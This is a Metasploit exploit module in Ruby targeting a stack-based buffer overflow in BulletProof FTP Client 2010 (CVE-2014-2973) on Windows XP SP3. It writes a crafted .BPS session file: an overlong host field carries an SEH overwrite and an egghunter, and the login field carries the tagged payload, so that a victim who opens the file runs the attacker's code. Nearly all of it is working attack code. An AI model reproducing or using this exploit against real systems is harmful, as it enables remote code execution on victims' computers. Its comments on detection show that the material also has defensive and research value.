  1. ##
  2. # This module requires Metasploit: http://metasploit.com/download
  3. # Made By Aluf
  4. # Current source: https://github.com/rapid7/metasploit-framework
  5. ##
  6.  
  7. require 'msf/core'
  8.  
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  # FILEFORMAT: this module only writes a file (file_create in #exploit); it
  # never connects to a host. Seh and Egghunter provide generate_seh_record
  # and generate_egghunter, both used in #exploit.
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::Egghunter

  # Registers the module metadata (references, payload constraints, the
  # single target) and the FILENAME option.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BulletProof FTP Client BPS Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability in
        BulletProof FTP Client 2010, caused by an overly long hostname.
        By persuading the victim to open a specially-crafted .BPS file, a
        remote attacker could execute arbitrary code on the system or cause
        the application to crash. This module has been tested successfully on
        Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Gabor Seljan'
        ],
      # Public advisories for this issue; CVE-2014-2973 is the tracking id.
      'References'     =>
        [
          [ 'EDB', '34162' ],
          [ 'EDB', '34540' ],
          [ 'EDB', '35449' ],
          [ 'OSVDB', '109547' ],
          [ 'CVE', '2014-2973' ],
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process'
        },
      'Platform'       => 'win',
      # BadChars: NUL, LF, CR and SUB (0x1a). CR/LF are the field separators
      # written in #exploit; the other two are presumably parser terminators
      # for the session file — not confirmed here.
      'Payload'        =>
        {
          'BadChars'   => "\x00\x0a\x0d\x1a",
          'Space'      => 2000
        },
      # Single target: the SEH handler is overwritten with a fixed address in
      # oleacc.dll, so the module is only expected to work where that exact
      # DLL build is loaded (Windows XP SP3 per the description above).
      'Targets'        =>
        [
          [ 'Windows XP SP3',
            {
              'Offset' => 89,         # bytes of random filler before the SEH record
              'Ret'    => 0x74c86a98  # POP EDI # POP ESI # RET [oleacc.dll]
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jul 24 2014',
      'DefaultTarget'  => 0
    ))

    # Output file name; written by file_create in #exploit.
    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.bps'])
      ],
    self.class)
  end

  # Builds the malicious .BPS session file and writes it with file_create.
  #
  # Layout, each field terminated by "\r\n":
  #   1. the fixed BulletProof session-file banner line
  #   2. host field: Offset bytes of random filler, the SEH record, then the
  #      egghunter stub
  #   3. port: 5 random digits
  #   4. login name: the tagged egg carrying the encoded payload
  #   5. password: 8 random letters
  #
  # From a detection standpoint the banner line looks legitimate; the tell is
  # a host line far longer than any hostname that carries binary (non-text)
  # bytes from the SEH record and hunter, plus the 'w00t' egg tag elsewhere
  # in the file.
  def exploit
    # Egghunter searches memory for the tagged egg; checksum mode lets the
    # hunter validate the egg before jumping to it.
    eggoptions = {
      :checksum => true,
      :eggtag => 'w00t'
    }

    hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

    sploit = "This is a BulletProof FTP Client Session-File and should not be modified directly.\r\n"
    sploit << rand_text_alpha(target['Offset'])
    sploit << generate_seh_record(target.ret)
    sploit << hunter               + "\r\n"  # FTP Server HOST / IP
    sploit << rand_text_numeric(5) + "\r\n"  # Port number
    sploit << egg                  + "\r\n"  # Login name
    sploit << rand_text_alpha(8)   + "\r\n"  # Login password

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file...")
    file_create(sploit)
  end

end